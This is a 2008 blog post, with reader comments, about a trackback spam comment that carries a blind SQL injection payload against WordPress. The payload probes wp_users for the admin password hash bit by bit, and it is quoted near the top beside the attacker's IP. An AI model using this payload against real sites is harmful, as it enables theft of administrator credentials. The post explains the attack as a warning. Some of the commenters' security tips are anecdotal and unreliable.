Attack of the Wordpress-Hacking Spam Trackbacks
June 7th, 2008 by Elliott Back
So this is a cute comment I got, a trackback spam that’s also a SQL injection exploit for Wordpress. Check it out:
Website: ‘ AND 1=0) UNION SELECT 1 FROM wp_users WHERE user_login=’admin’ and substring(reverse(lpad(conv(substring(user_pass,8,1), 16, 2),4,’0′)),4,1)=’1′ /* (IP: 124.217.250.190 , svservers.com)
URI: http://None
Excerpt: None…
It appears to be a known-cryptotext or weak-hash exploit against Wordpress looking for an admin password with an obvious signature. Cute.
Posted in Spam
Tagged with lpad, admin password, sql injection, trackback spam, hash, excerpt, signature
I’m managing my friend’s blog, and I found this just a few moments ago. I’m currently logged in as admin. Is there anything to worry about, or is this just another failed SQL injection
Thanks Sebastian. http://codex.wordpress.org/Users_Authors_and_Users_SubPanel is the official writeup of what you suggest.
@Cody – probably a separate username / password setup in Control panel. Look under protected directories depending on what Cp you use.
@hot gadgets changing the default user name from admin to something else means that the attackers have to look for both a user name and a password which increases the complexity.
If they already know there is a user called admin then part of their problem is solved.
Actually, someone found a fraud backlink code which disables comments from any IP ranging in the list of Hosting Providers.
Meaning… if IP=(LIST)&REQUEST_URI=WP-COMMENT.PHP then it’s been redirected to another page automatically. Mainly, renaming your wp-comment.php normally solves this issue.(except multi-blogs)
azrin @ http://www.chat.nu
How changing admins solves the problem?
All of a sudden my WordPress blog is showing a “Restricted Access” popup window asking all visitors to my site to provide a username and password.
Does anyone know is this is some sort of spam attack?
If so, can anyone tell me where to look in my admin panel to fix this?
I posted this question over at the WordPress forum but got no responses and the info I’ve seen in the WordPress troubleshooting forum didn’t clear up my question.
Thanks in advance!
People should be sharing more free things like this. Its what keeps the Internet buzzin’.
spammers are so frustrating.isnt there some way to get rid of them
You must change your admins username to secure your blog.
1. create new user and give him admin rights.
2. log out and log in with new user account and delete old admin account. but attention: when deleting the old account it asks you to move your posts to the new account. check yes!
Sebastian
Knowtebook
So is this a WP security hole in 2.5.1 of Wordpress? Or has the hole been plugged up by now.
Can I prevent that SQL injection by disabling trackbacks?
I’m managing my friend’s blog, and I found this just a few moments ago. I’m currently logged in as admin. Is there anything to worry about, or is this just another failed SQL injection?
This is what I got:
Thanks!